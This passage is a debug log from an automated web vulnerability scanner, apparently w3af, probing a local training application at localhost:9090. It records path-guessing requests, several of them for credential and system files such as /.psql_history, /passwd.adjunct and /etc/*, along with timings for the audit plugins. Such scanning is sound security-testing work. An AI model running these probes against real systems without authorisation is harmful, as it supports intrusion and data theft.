10:04:31 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12344, 'reject-seen-url': 5721, 'reject-out-of-scope': 216, 'accept': 4944} [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/fpadmin/ returned HTTP code "404" (id=23803,from_cache=0,grep=1,rtt=0.05,did=8BPJGOvS) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/publicar/ returned HTTP code "404" (id=23855,from_cache=0,grep=1,rtt=0.03,did=GnoHCYUL) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/dan_o.dat returned HTTP code "404" (id=23857,from_cache=0,grep=1,rtt=0.20,did=mmqhhF0H) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/test.html returned HTTP code "404" (id=23860,from_cache=0,grep=1,rtt=0.18,did=jk1LsJGs) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/solaris/ returned HTTP code "404" (id=23862,from_cache=0,grep=1,rtt=0.06,did=IGYlcWoT) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/applicattions/ returned HTTP code "404" (id=23865,from_cache=0,grep=1,rtt=0.09,did=dULvYo0Y) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/dev/ returned HTTP code "404" (id=23867,from_cache=0,grep=1,rtt=0.20,did=jVULWXhs) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/movimientos/ returned HTTP code "404" (id=23870,from_cache=0,grep=1,rtt=0.04,did=qcRVBHxP) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/log.htm returned HTTP code "404" (id=23871,from_cache=0,grep=1,rtt=0.12,did=StlUDlPu) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2262. [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/info/ returned HTTP code "404" (id=23858,from_cache=0,grep=1,rtt=0.11,did=NOBkisVF) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/bbv/ returned HTTP code "404" (id=23875,from_cache=0,grep=1,rtt=0.06,did=1uiFEJch) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/.psql_history returned HTTP code "404" (id=23856,from_cache=0,grep=1,rtt=0.13,did=BoyXgBbK) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/sell/ returned HTTP code "404" (id=23863,from_cache=0,grep=1,rtt=0.13,did=RPdCTf7j) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/vfs/ returned HTTP code "404" (id=23868,from_cache=0,grep=1,rtt=0.07,did=9Krlz1QE) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/certificado/ returned HTTP code "404" (id=23872,from_cache=0,grep=1,rtt=0.04,did=mQAFWE6G) [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/java-plugin/ returned HTTP code "404" (id=23869,from_cache=0,grep=1,rtt=0.03,did=UHBSfc3d) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/logger.html returned HTTP code "404" (id=23861,from_cache=0,grep=1,rtt=0.17,did=Ud8uMSA1) [Wed Feb 12 10:04:31 2020 - debug] localhost:9090 connection pool stats (free:202 / in_use:5 / max:50 / total:207) [Wed Feb 12 10:04:31 2020 - debug] Connections with more in use time: (3cfefc9a988f4524, 0.17 sec) (07967ee46cec26aa, 0.16 sec) (5473de5ef07626b2, 0.13 sec) (1201f70c19bbd123, 0.10 sec) (2b864b22fc733df2, 0.07 sec) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/passwd.adjunct returned HTTP code "404" (id=23859,from_cache=0,grep=1,rtt=0.10,did=dFI9jM27) [Wed Feb 12 10:04:31 2020 - debug] clamav.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:31 2020 - debug] GET http://localhost:9090/etc/* returned HTTP code "404" (id=23866,from_cache=0,grep=1,rtt=0.06,did=ouydgYHk) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/perl5/ returned HTTP code "404" (id=23864,from_cache=0,grep=1,rtt=0.22,did=ERNQT6aa) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/cgi-bin/add_ftp.cgi returned HTTP code "404" (id=23876,from_cache=0,grep=1,rtt=0.10,did=5qVqI1K9) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/fbsd/ returned HTTP code "404" (id=23854,from_cache=0,grep=1,rtt=0.15,did=3c3Jik9N) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/manage/cgi/cgiproc returned HTTP code "404" (id=23873,from_cache=0,grep=1,rtt=0.10,did=HY6LYgsr) [Wed Feb 12 10:04:31 2020 - debug] HEAD http://localhost:9090/idea/ returned HTTP code "404" (id=23874,from_cache=0,grep=1,rtt=0.05,did=0Er5qF0Z) [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2263. [Wed Feb 12 10:04:31 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:31 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4533. [Wed Feb 12 10:04:31 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2264. [Wed Feb 12 10:04:32 2020 - debug] xpath.audit(did="i7pO6shN",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 10.96s to run [Wed Feb 12 10:04:32 2020 - debug] rfd.audit(did="XqGB3IP4", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:32 2020 - debug] URL "http://localhost:9090/learn/vulnerability/a5_broken_access_control" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 22926 [Wed Feb 12 10:04:32 2020 - debug] rfd.audit(did="XqGB3IP4",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] rfi.audit(did="XSGzPC9f", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:32 2020 - debug] xxe.audit(did="OrkSvAK4",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 10.94s to run [Wed Feb 12 10:04:32 2020 - debug] frontpage.audit(did="7xWY8srm", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:32 2020 - debug] preg_replace.audit(did="1231GeuJ",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 10.82s to run [Wed Feb 12 10:04:32 2020 - debug] ssi.audit(did="CLJfQnkl",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 10.96s to run [Wed Feb 12 10:04:32 2020 - debug] mx_injection.audit(did="Zog3jme4",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 10.35s to run [Wed Feb 12 10:04:32 2020 - debug] response_splitting.audit(did="DH3AQtkJ",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 9.85s to run [Wed Feb 12 10:04:32 2020 - debug] eval.audit(did="xeIAf2q7",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 10.93s to run [Wed Feb 12 10:04:32 2020 - debug] frontpage.audit(did="7xWY8srm",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.02s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2265. [Wed Feb 12 10:04:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:32 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:XSGzPC9f) [Wed Feb 12 10:04:32 2020 - debug] url_session.grep(uri="http://localhost:9090/5/") took 0.02s to run [Wed Feb 12 10:04:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] objects.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] error_500.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] lang.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:32 2020 - debug] rfi.audit(did="XSGzPC9f",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.04s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2266. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/atc/ returned HTTP code "404" (id=23877,from_cache=0,grep=1,rtt=0.17,did=wKRMng4c) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/ejemplo/ returned HTTP code "404" (id=23878,from_cache=0,grep=1,rtt=0.09,did=57BafKcQ) [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12361, 'reject-seen-url': 5727, 'reject-out-of-scope': 216, 'accept': 4946} [Wed Feb 12 10:04:32 2020 - debug] error_pages.grep(uri="http://localhost:9090/5/") took 0.03s to run [Wed Feb 12 10:04:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] ssn.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] oracle.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] feeds.grep(uri="http://localhost:9090/5/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/5/") took 0.04s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2267. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2268. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/console returned HTTP code "404" (id=23879,from_cache=0,grep=1,rtt=0.09,did=2fXTkN4J) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/clientes/ returned HTTP code "404" (id=23880,from_cache=0,grep=1,rtt=0.13,did=f370wThu) [Wed Feb 12 10:04:32 2020 - debug] symfony.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/new/ returned HTTP code "404" (id=23883,from_cache=0,grep=1,rtt=0.15,did=4oEgSNEl) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/adm/ returned HTTP code "404" (id=23887,from_cache=0,grep=1,rtt=0.26,did=3FmLbHRE) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/hits.txt returned HTTP code "404" (id=23889,from_cache=0,grep=1,rtt=0.05,did=jZaTgUzK) [Wed Feb 12 10:04:32 2020 - debug] file_upload.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/orders/ returned HTTP code "404" (id=23885,from_cache=0,grep=1,rtt=0.08,did=eKyYlq4c) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/stat.htm returned HTTP code "404" (id=23888,from_cache=0,grep=1,rtt=0.13,did=CGhOx0or) [Wed Feb 12 10:04:32 2020 - debug] expect_ct.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] svn_users.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] private_ip.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] motw.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_generator.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] retirejs.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:32 2020 - debug] serialized_object.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] blank_body.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] credit_cards.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] websockets_links.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] csp.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] dom_xss.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] keys.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/admin/wg_user-info.ml returned HTTP code "404" (id=23884,from_cache=0,grep=1,rtt=0.03,did=CPvAmArm) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/status/ returned HTTP code "404" (id=23881,from_cache=0,grep=1,rtt=0.05,did=lRr0CnEa) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2269. [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/iisadmpwd/aexp2b.htr returned HTTP code "404" (id=23886,from_cache=0,grep=1,rtt=0.11,did=1o8rYf1D) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/wwwboard/wwwboard.pl returned HTTP code "404" (id=23882,from_cache=0,grep=1,rtt=0.04,did=Ze4UDBoK) [Wed Feb 12 10:04:32 2020 - debug] global_redirect.audit(did="TPayqwMD",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 11.20s to run [Wed Feb 12 10:04:32 2020 - debug] clamav.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/WebTrend/ returned HTTP code "404" (id=23890,from_cache=0,grep=1,rtt=0.18,did=Ns415vWP) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2270. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2271. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2272. [Wed Feb 12 10:04:32 2020 - debug] vulners_db.grep(uri="http://localhost:9090/rss/") took 0.08s to run [Wed Feb 12 10:04:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] objects.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] error_500.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] lang.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] url_session.grep(uri="http://localhost:9090/rss/") took 0.06s to run [Wed Feb 12 10:04:32 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:32 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: jn5omf5C) [Wed Feb 12 10:04:32 2020 - debug] localhost:9090 connection pool stats (free:207 / in_use:4 / max:50 / total:211) [Wed Feb 12 10:04:32 2020 - debug] Connections with more in use time: (d29811e16aa2f11f, 0.09 sec) (016faaeb4d80f963, 0.03 sec) (2b864b22fc733df2, 0.02 sec) (c28da73be1ab3563, 0.00 sec) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/registered/ returned HTTP code "404" (id=23891,from_cache=0,grep=1,rtt=0.12,did=XsbstYCO) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/photo/ returned HTTP code "404" (id=23893,from_cache=0,grep=1,rtt=0.11,did=14cweIES) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/webcart/ returned HTTP code "404" (id=23892,from_cache=0,grep=1,rtt=0.18,did=kQukQR61) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/swf returned HTTP code "404" (id=23894,from_cache=0,grep=1,rtt=0.06,did=Tx4iWb60) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/caja/ returned HTTP code "404" (id=23895,from_cache=0,grep=1,rtt=0.09,did=FrnpOMol) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/windmail.exe returned HTTP code "404" (id=23896,from_cache=0,grep=1,rtt=0.05,did=JSRDXXxJ) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/Admin_files/ returned HTTP code "404" (id=23897,from_cache=0,grep=1,rtt=0.18,did=0u0DtnXa) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/ash returned HTTP code "404" (id=23898,from_cache=0,grep=1,rtt=0.06,did=kXf4kCXJ) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2273. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/dat/ returned HTTP code "404" (id=23901,from_cache=0,grep=1,rtt=0.10,did=zzxHgbHT) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/log.html returned HTTP code "404" (id=23902,from_cache=0,grep=1,rtt=0.11,did=04YZhkhL) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/devel/ returned HTTP code "404" (id=23903,from_cache=0,grep=1,rtt=0.11,did=y0JQzICl) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/tree/ returned HTTP code "404" (id=23904,from_cache=0,grep=1,rtt=0.12,did=h5lNWkDF) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/source/ returned HTTP code "404" (id=23906,from_cache=0,grep=1,rtt=0.13,did=4CYk0g8Q) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/privado/ returned HTTP code "404" (id=23907,from_cache=0,grep=1,rtt=0.12,did=zvFRI7p7) [Wed Feb 12 10:04:32 2020 - debug] error_pages.grep(uri="http://localhost:9090/rss/") took 0.28s to run [Wed Feb 12 10:04:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] ssn.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] oracle.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] feeds.grep(uri="http://localhost:9090/rss/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/save/ returned HTTP code "404" (id=23899,from_cache=0,grep=1,rtt=0.15,did=UvZigdhz) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/ejemplos/ returned HTTP code "404" (id=23905,from_cache=0,grep=1,rtt=0.02,did=aAzAVv69) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4534. [Wed Feb 12 10:04:32 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12381, 'reject-seen-url': 5732, 'reject-out-of-scope': 216, 'accept': 4946} [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/hit_tracker/ returned HTTP code "404" (id=23908,from_cache=0,grep=1,rtt=0.09,did=JmJZ2kvH) [Wed Feb 12 10:04:32 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/rss/") took 0.14s to run [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2274. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/marketing/ returned HTTP code "404" (id=23909,from_cache=0,grep=1,rtt=0.07,did=jCS0chIp) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/auth/ returned HTTP code "404" (id=23911,from_cache=0,grep=1,rtt=0.14,did=oBwBbccc) [Wed Feb 12 10:04:32 2020 - debug] GET http://localhost:9090/iisadmpwd/aexp3.htr returned HTTP code "404" (id=23910,from_cache=0,grep=1,rtt=0.05,did=51oJ7Ukn) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/log/ returned HTTP code "404" (id=23912,from_cache=0,grep=1,rtt=0.27,did=Czol5gjQ) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2275. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/filemail.pl returned HTTP code "404" (id=23914,from_cache=0,grep=1,rtt=0.19,did=V8lwQIE0) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/orders/checks.txt returned HTTP code "404" (id=23915,from_cache=0,grep=1,rtt=0.07,did=XEZuriej) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/stat/ returned HTTP code "404" (id=23917,from_cache=0,grep=1,rtt=0.18,did=pcyuMKjR) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/clients/ returned HTTP code "404" (id=23918,from_cache=0,grep=1,rtt=0.04,did=oevhV6FE) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/store/ returned HTTP code "404" (id=23919,from_cache=0,grep=1,rtt=0.04,did=tmHvvK7F) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/ideas/ returned HTTP code "404" (id=23922,from_cache=0,grep=1,rtt=0.16,did=ioTwqKWr) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/w3perl/admin returned HTTP code "404" (id=23923,from_cache=0,grep=1,rtt=0.15,did=Ro7EiyC6) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/mp3/ returned HTTP code "404" (id=23920,from_cache=0,grep=1,rtt=0.23,did=8pL2LyjY) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/publico/ returned HTTP code "404" (id=23921,from_cache=0,grep=1,rtt=0.13,did=KMd3yBcZ) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/test.txt returned HTTP code "404" (id=23913,from_cache=0,grep=1,rtt=0.25,did=jJCexFuO) [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/correo/ returned HTTP code "404" (id=23916,from_cache=0,grep=1,rtt=0.09,did=o3s2sWRX) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2276. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2277. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2278. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/php/ returned HTTP code "404" (id=23924,from_cache=0,grep=1,rtt=0.08,did=9YVKKbEc) [Wed Feb 12 10:04:32 2020 - debug] localhost:9090 connection pool stats (free:213 / in_use:1 / max:50 / total:214) [Wed Feb 12 10:04:32 2020 - debug] Connections with more in use time: (7ac9f0a9dad1d800, 0.09 sec) [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2279. [Wed Feb 12 10:04:32 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2280. [Wed Feb 12 10:04:32 2020 - debug] HEAD http://localhost:9090/cgi-bin/classifieds.cgi returned HTTP code "404" (id=23926,from_cache=0,grep=1,rtt=0.09,did=MIcILTWD) [Wed Feb 12 10:04:32 2020 - debug] symfony.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] private_ip.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] motw.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] meta_generator.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] retirejs.grep(uri="http://localhost:9090/1999/") took 0.00s to run [Wed Feb 12 10:04:32 2020 - debug] 